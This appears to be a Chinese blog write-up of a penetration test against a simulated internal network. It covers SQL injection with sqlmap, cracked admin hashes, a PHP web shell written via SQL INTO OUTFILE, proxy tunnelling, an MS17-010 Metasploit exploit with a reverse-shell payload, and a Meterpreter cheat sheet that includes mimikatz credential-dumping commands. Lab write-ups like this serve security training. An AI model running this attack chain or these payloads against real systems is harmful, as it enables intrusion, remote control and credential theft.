學習滲透測試三個多月了
總結了下經驗進行了一次內網滲透
環境是模擬的
目標IP192.168.31.102 該web主機下 有兩台虛擬機
滲透目標: 拿到虛擬機的shell
先信息收集、
目標綁定jy.test.com
訪問192.168.31.196存在探針
Nmap端口掃描192.168.31.196
開放135、 3306 、 445 、 139、 80 端口
御劍掃描后台發現后台地址
並且存在info頁面
一階段:拿主站
訪問目標網站
對主站進行測試的時候發現存在明顯的SQL注入
payloadhttp://jy.test.com/person/cnresume_view.php?rid=1
用SQLmap跑一把
python sqlmap.py -u"http://jy.test.com/person/cnresume_view.php?rid=1" --dbs
最后拋出3個管理,兩個普通1個超級管理
超管沒解開hash
登陸用戶:
dada
密碼:mysql123
| a_id | a_user | a_pass |
+------+--------+---------------------------------------------+
| 1 | admin | fb0641386d3de664367b6a0b9f2ed5a2 |
| 2 | data | ed54ae97e472d89f0227cba22158731a (mysql123) |
| 3 | kefu | 17f3e52d5392ff8dc3c78b22db194f0d |
+------+--------+---------------------------------------------+
用data普通管理登陸后台之后隨便搞了搞發現竟然可以執行sql語句,我得天。。
並且存在越權漏洞
first、先說一下這個越權漏洞
登陸data普通管理員賬號
點擊添加管理員提示無權限
用burp抓包修改參數,把管理改為超管
繼續此操作添加了一個admin同級的超管
second、再說這個sql語句執行直接寫入一句話木馬
sql命令
select "<?php eval($_POST[szg]);?>" into outfile "C:/UPUPW_AP5.2/htdocs/szg.php"
連接1句話木馬上傳
上傳大馬執行arp -a
海岸該主機下還存在
192.168.238.129
192.168.238.130
三、
我們的C段實在192.168.31 與目標內網並不在同一個段內
所以需要打穿隧道具體方法下邊這篇文章有介紹
https://www.cnblogs.com/xiaoyunxiaogang/p/10939485.html
在kaili的proxychains 和 reGeorgSocksProxy配合進行代理
vim /etc/proxychains.conf
去掉dynamic_chain前面的#號
去掉最后一行socks4那行,然后添加socks5 127.0.0.1 8080(我的占用了這里是用的1080)
shift+:wq保存並退出
之后想讓哪個命令或者應用通過代理直接用命令proxychains+對應的命令或者應用,例如:
proxychains firefox
啟動火狐瀏覽器
訪問我們ping不通的 192.168.238.128代理成功
用nmap進行掃描192.168.238.129/130
目標開放445端口且是XP系統
我們
使用exploit模塊來進行攻擊測試
use exploit/windows/smb/ms17_010_psexec
set payload windows/x64/meterpreter/reverse_tcp //###set payload windows/meterpreter/reverse_tcp### //針對目標機器使用的系統版本,目標機器32位就使用32位(去掉*64)
run返彈了一個shell
系統是system權限沒進行限制
添加一個用戶
下面的就自己操作了
下面是一些MSF中的常用命令
基本命令
help# 查看Meterpreter幫助
background#返回,把meterpreter后台掛起
bgkill# 殺死一個背景 meterpreter 腳本
bglist#提供所有正在運行的后台腳本的列表
bgrun#作為一個后台線程運行腳本
channel#顯示活動頻道
sessions -i number # 與會話進行交互,number表示第n個session,使用session -i 連接到指定序號的meterpreter會話已繼續利用
sesssions -k number #與會話進行交互
close# 關閉通道
exit# 終止 meterpreter 會話
quit# 終止 meterpreter 會話
interact id #切換進一個信道
run#執行一個已有的模塊,這里要說的是輸入run后按兩下tab,會列出所有的已有的腳本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等
irb# 進入 Ruby 腳本模式
文件系統命令
cat c:\boot.ini#查看文件內容,文件必須存在
del c:\boot.ini #刪除指定的文件
upload /root/Desktop/netcat.exe c:\ # 上傳文件到目標機主上,如upload setup.exe C:\\windows\\system32\
download nimeia.txt /root/Desktop/ # 下載文件到本機上如:download C:\\boot.ini /root/或者download C:\\"ProgramFiles"\\Tencent\\QQ\\Users\\295******125\\Msg2.0.db /root/
edit c:\boot.ini # 編輯文件
getlwd#打印本地目錄
getwd#打印工作目錄
lcd#更改本地目錄
ls#列出在當前目錄中的文件列表
lpwd#打印本地目錄
pwd#輸出工作目錄
cd c:\\ #進入目錄文件下
rm file #刪除文件
mkdir dier #在受害者系統上的創建目錄
rmdir#受害者系統上刪除目錄
dir#列出目標主機的文件和文件夾信息
mv#修改目標主機上的文件名
search -d d:\\www -f web.config #search 文件,如search -d c:\\ -f*.doc
meterpreter > search -f autoexec.bat #搜索文件
meterpreter > search -f sea*.bat c:\\xamp\\
enumdesktops #用戶登錄數
(1)下載文件
使用命令“download +file path”,將下載目標機器的相對應權限的任何路徑下的文件
(2)上傳文件
“upload”命令為上傳文件到我們的目標機器,在圖中我們上傳了ll.txt到目標機器的c:\pp\下。
(3)查看文件
“cat filename”在當前目錄下查看文件內容,輸入命令后便會返回給我們所查看文件的內容。
mimikatz模塊:
meterpreter > load mimikatz #加載mimikatz
meterpreter > msv #獲取hash值
meterpreter > kerberos #獲取明文
meterpreter >ssp #獲取明文信息
meterpreter > wdigest #獲取系統賬戶信息
meterpreter >mimikatz_command -f a:: #必須要以錯誤的模塊來讓正確的模塊顯示
meterpreter >mimikatz_command -f hash:: #獲取目標 hash
meterpreter > mimikatz_command -f samdump::hashes
meterpreter > mimikatz_command -f sekurlsa::searchPasswords